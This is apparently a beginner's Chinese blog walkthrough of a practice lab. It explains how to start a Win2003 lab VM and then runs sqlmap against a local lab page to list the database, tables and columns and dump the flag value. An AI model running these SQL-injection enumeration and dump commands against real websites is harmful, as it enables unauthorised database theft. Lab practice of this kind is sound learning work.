前言:没有任何基础,且这是第一次接触靶场,不要说题目看不懂,就连如何进入靶场都成难题。知道自己不会还好,就怕明明不会、没有进入靶场且以为进入靶场误以为自己已成功进入靶场,我就是这样子。之前直接在win2003上打开靶场,就觉得自己对了,但不是这样子的,到现在我才知道如何进入靶场。
进入靶场方法
用winrar将安装包解压,用VM虚拟机打开解压文件里的win2003虚拟机文件。进入虚拟机系统后,打开命令行,输入:ipconfig,查看虚拟机的IP地址,然后直接在linux虚拟机的浏览器上输入该IP地址,就可以直接进入靶场了。如下图所示。
好了,现在我们可以开始冲关了。先看一下题目,题目完全看不懂,题目如下图所示:
纳尼,这是什么?高数我不会,还能看懂题目,可这道题题目完全看不懂,明明大家大家都是中国人,都说中国话,为什么你说的话我听不懂。没办法了,只能看看大佬们咋么玩,向大佬学习吧。我参考大佬博客网址是:https://blog.csdn.net/qq_28719743/article/details/83274749
大佬是使用sqlmap工具,先查询当前数据库名,查表,查字段,查flag值就ok了。可对于我这个技术小白来说,工具名是第一次听说,也是第一次用,所以先知道如何去做,然后再来学习为什么要这样做。
下面是获得flag的攻击过程
我的虚拟机Ip地址是172.20.10.14
查询当前的数据库名
sqlmap -u "http://172.20.10.14/pentest/test/sqli/sqltamp.php?gid=1" --current-d
查表
sqlmap -u "http://172.20.10.14/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --tables
查字段
sqlmap -u "http://172.20.10.14/pentest/test/sqli/sqltamp.php?gid=1 "-D pentesterlab -T flag --colum
查flag值
sqlmap -u "http://172.20.10.14/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag,id --dump
ok,到这里的话就把flag的值拿到了,可以去下一关了。